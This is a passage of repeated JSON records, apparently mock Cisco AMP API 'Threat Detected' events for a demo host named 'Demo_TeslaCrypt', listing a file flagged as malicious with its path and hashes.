Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163564","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":20000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163563","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":833000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196265","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":818000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196264","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196263","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":693000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":630000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196260","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":584000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":443000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196258","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196257","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
